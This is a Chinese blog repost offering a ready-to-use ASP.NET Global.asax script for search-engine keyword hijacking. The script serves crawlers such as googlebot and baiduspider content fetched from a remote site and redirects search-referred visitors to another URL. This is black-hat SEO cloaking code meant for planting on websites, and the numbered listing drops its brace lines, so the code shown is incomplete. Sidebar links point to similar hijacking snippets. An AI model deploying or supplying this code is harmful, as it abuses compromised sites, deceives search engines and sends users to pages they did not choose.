搜索引擎关键词劫持之.net篇

最新推荐文章于 2021-03-17 02:52:21 发布
最新推荐文章于 2021-03-17 02:52:21 发布
阅读量94 收藏
点赞数
原文链接:http://www.cnblogs.com/cncz/articles/3777127.html
版权

摘要:蛋疼写的,有需要的就拿去,注意要保存为Global.asax。 重要说明:为避免编码问题,请在劫持页面(data_url)指向页面加入meta标记来指明编码,如 meta content=text/html; charset=utf-8 http-equiv=Content-Type/ 来指明是UTF-8编码,以避免乱码问题。 %@A...

蛋疼写的,有需要的就拿去,注意要保存为Global.asax。
重要说明:为避免编码问题,请在劫持页面(data_url)指向页面加入meta标记来指明编码,如

<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>

来指明是UTF-8编码,以避免乱码问题。

    1. <%@ Application Language="C#" %> 
    2. <script runat="server"> 
    3.  
    4. void Application_Start(object sender, EventArgs e) 
    6. //在应用程序启动时运行的代码 
    8. void Application_End(object sender, EventArgs e) 
    10. //在应用程序关闭时运行的代码 
    12.  
    13. void Application_Error(object sender, EventArgs e) 
    15. //在出现未处理的错误时运行的代码 
    17.  
    18. void Session_Start(object sender, EventArgs e) 
    20. //在新会话启动时运行的代码 
    21. //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); 
    22. string data_url = "http://www.yunsec.net";//要展示给搜索引擎的页面 
    23. string redirect_url="http://www.yunsec.net/1.asp";//从搜索引擎点击进来跳转的页面 
    24. if (is_spider()) 
    26. HttpContext.Current.Response.Clear(); 
    27. HttpContext.Current.Response.BinaryWrite(get_data(data_url)); 
    28. HttpContext.Current.Response.End(); 
    30. else if(is_from_search()) 
    32. HttpContext.Current.Response.Redirect(redirect_url, true); 
    34. else 
    36. //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); 
    39.  
    40. void Session_End(object sender, EventArgs e) 
    42. //在会话结束时运行的代码。 
    43. // 注意: 只有在 Web.config 文件中的 sessionstate 模式设置为 
    44. // InProc 时,才会引发 Session_End 事件。如果会话模式 
    45. //设置为 StateServer 或 SQLServer,则不会引发该事件。 
    46.  
    48. public bool is_spider() 
    50. string spider_flag = "googlebot|baiduspider|sogou|yahoo|soso";//这里添加搜索引擎user-agent标识 
    51. string[] spider_flagspider_flag_arr = spider_flag.Split('|'); 
    52. string user_agent=HttpContext.Current.Request.UserAgent; 
    53. foreach (string tmp_flag in spider_flag_arr) 
    55. if (user_agent.ToLower().IndexOf(tmp_flag.ToLower())!=-1) { return true; } 
    57. return false; 
    59. public bool is_from_search() 
    61. if (HttpContext.Current.Request.UrlReferrer==null) 
    63. return false; 
    65. else 
    67. string page_ref = HttpContext.Current.Request.UrlReferrer.ToString(); 
    68. string search_flag = "google|baidu|sogou|yahoo|soso"; //这里添加搜索引擎url标识 
    69. string[] search_flagsearch_flag_arr = search_flag.Split('|'); 
    70. foreach (string tmp_flag in search_flag_arr) 
    72. if (page_ref.ToLower().IndexOf(tmp_flag.ToLower()) != -1) { return true; } 
    74. return false; 
    77. public byte[] get_data(string url) 
    79. System.Net.WebClient wc = new System.Net.WebClient(); 
    80. byte[] data = wc.DownloadData(url); 
    81. return data; 
    83.  
    84. </script>

转载于:https://www.cnblogs.com/cncz/articles/3777127.html

weixin_30821731
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全提高] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[网络安全自学] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
搜索引擎劫持.net
SpiderM的专栏
08-25 443
注意要保存为Global.asax。     void Application_Start(object sender, EventArgs e)     {         //在应用程序启动时运行的代码     }         void Application_End(object sender, EventArgs e)     {
Global.asax详解
weixin_30436101的博客
08-21 674
转自:http://blog.163.com/zhu_jie66/blog/static/364322642007102744510454/ global.asax是一个文本文件,它提供全局可用代码。这些代码包括应用程序的事件处理程序以及会话事件、方法和静态变量。有时该文件也被称为应用程序文件。 global.asax文件中的任何代码都是它所在的应用程序的一部分。...
php全局劫持程序,黑帽SEO网站快照全局劫持完整程序代码 黑帽SEO网站快照全局劫持...
weixin_32404293的博客
03-17 474
快速排名提供,全局和首页快照不一样。(Black hat SEO website snapshot global hijacking complete program code, 2012-06-17 黑帽SEO网站快照全局劫持完整程序代码\global.asax\loadasax. gif 。2144 , 0 , 2018-05-20 近期下载者 : 。837 , 2018-05-20 黑帽SE...
【黑帽SEO系列】网页劫持
asdf8968的博客
11-27 4592
  网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。 网站劫持检测 1、检测网站是否被劫持 2、域名是否被墙 3、...
搜索引擎算法大全-(百度+360+搜狗)
FaTiao.Net的博客
07-17 3070
各大搜索引擎服务商最近3年都做了哪些算法更新?这些算法更新对网站带来哪些的影响和扶持?本章节就来具体的讲解一下,给站长们罗列个清单,以提供查询便利。 搜索引擎算法大全 超链算法升级 发布日期:2015-08-11 算法主旨:百度超链算法全面升级,提升了对垃圾外链的识别与覆盖。 算法详情:超链算法升级后扩大了对垃圾外链的覆盖。同时百度站长平台的外链分析工具升级更名为链接分析,除了增加死链数据分析外、取消了外链拒绝功能,即不再需要网站管理员进行手工拒绝,百度可自动对垃圾外链进行处理。 升级解读:站点进
百度劫持有哪些特征,百度快照劫持处理方法及流程?
hua520064的博客
01-15 388
每一个SEO专家,都是从新手一步步走过来的,他们鉴证了算法的不断调整,同时也领教过各种黑帽SEO技术,比如:百度快照劫持,它曾经让很多站长头疼,甚至并不了解这个名词,这算是一个老生常谈的词汇,但时至今日,还在不断发生。很多站长都知道,百度快照劫持是黑帽SEO的一种手段(就是学了皮毛的黑客技术)为了宣传自己网站流量为目的,对一些网站进行了劫持,对于这样的问题,下面就各位讲一讲有关百度快照被劫持的问题。 IIS7网站监控可以及时防控网站风险,快速准确监控网站是否遭到各种劫持攻击,网站在全国是否能正常打开(查看域
通俗易懂,什么是.NET?什么是.NET Framework?什么是.NET Core? .Net Web开发技术栈...
07-02 1993
通俗易懂,什么是.NET?什么是.NET Framework?什么是.NET Core? 什么是.NET?什么是.NET Framework?本文将从上往下,循序渐进的介绍一系列相关.NET的概念,先从类型系统开始讲起,我将通过跨语言操作这个例子来逐渐引入一系列.NET的相关概念,这主要包括:CLS、CTS(CLI)、FCL、Windows下CLR的相关核心组成、Wind...
搜索关键词劫持跳转
05-09
百度搜索关键词劫持跳转 if InStr(REFERER,keywords1) > 0 Or InStr(REFERER,keywords2)> 0 Or InStr(REFERER,keywords3> 0 Or InStr(REFERER,keywords4)> 0 Or InStr(REFERER,keywords5)> 0 Then
ASP.NET 3.5核心编程学习笔记(27):global.asax文件
weixin_30608131的博客
04-23 173
  通过global.asax,Web应用程序能够处理某些由ASP.NET运行库或已注册的HTTP模块引发的应用程序级事件。为使该文件中的内容生效,global.asax文件必须置于应用程序的根目录下。 global.asax的编译   如果定义了global.asax文件,那么在应用程序启动时,该文件会被解析为源类,并会被编译。下面是ASP.NET根据global.asax文件生成的C#代码...
搜索引擎关键词劫持之asp
weixin_34362991的博客
07-26 260
摘要:关键词劫持(黑帽seo)其实原理很简单:搜索引擎关键词劫持的过程实际上就是,修改肉鸡站点(webshell站点)A的首页(希望被搜索引擎收录的页面,一般情况下是首页),使之做出判断... 黑帽SEO代码一: &lt;% function GetBot() '查询蜘蛛 dim s_agent GetBot="" s_agent=Request.ServerVar...
劫持页面根据路径参数自动做跳转
FireBird_one的博客
05-12 857
&lt;!--推广自动登录--&gt; &lt;script type="text/javascript"&gt;        $(function () {            //推广自动登录            function getQueryString() {                var qrcode = location.search == 0 ? '' : loca...
黑帽SEO研究之js快照劫持代码分析
热门推荐
疯狂棒棒糖的博客
06-11 1万+
黑帽SEO研究之js快照劫持代码分析作者:疯狂棒棒糖一.前言在一次对客户给的资产做渗透测试的时候发现了有外挂bc页面的链接,心血来潮想搞清楚其原理,顺便将研究的过程分享给大家。首先,SEO分为黑帽SEO和白帽SEO:黑帽SEO通常采用搜索引擎禁止的方式优化网站,影响搜索引擎对网站排名的合理和公正性。黑帽SEO包括很多很多手法,技术含量也要求很高。比如:流量劫持、快照劫持、泛域名、泛ip、变种ip、...
手机百度、神马等搜索劫持实现原理剖析,手机搜索返回键跳转劫持,百度、搜狗霸屏劫持实现原理剖析
橙虚缘空间
06-20 9900
提示:勿用于非法用途,否则后果作者概不负责 一、来源 来源:下面一条新闻 二、实现 当然自己也刻意亲历过,于是乎自己就想来实现,其实也很简单。整体思路:对返回事件监听,链接到自己伪装的搜索引擎界面。 1.对返回事件监听 $(document).ready(function(e) { var counter = 0;...
百度揽钱秘密:劫持关键词 凤巢模式成吸金黑洞
至今思项羽,不肯过江东
06-18 1万+
“百度跟携程两位互联网行业大佬,缺乏最基本的道德底线,尤其是百度,经常做些强奸民意的事情”。北京掌上通网络技术有限公司(以下简称“掌上通”)总裁肖庆平对时代周报记者如此评价。“百度很霸道”—这是行业内对百度的评价 ,但是鲜少有人具体知道其“霸道”的程度。比如,肖庆平有天忽然发现在百度搜索“掌上通”,却在首页首位赫然显示“掌上通—订机票就上携程网”,点击该链接进去便是携程网的首页。   “
ASP.NET中会话状态实现与优化
在ASP.NET中实现会话状态基础是一项关键任务,尤其是在无状态的Web应用程序中,确保用户状态信息的持久化和管理是至关重要的。...因此,理解并熟练掌握ASP.NET的会话状态管理是每个Web开发者必备的技能之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值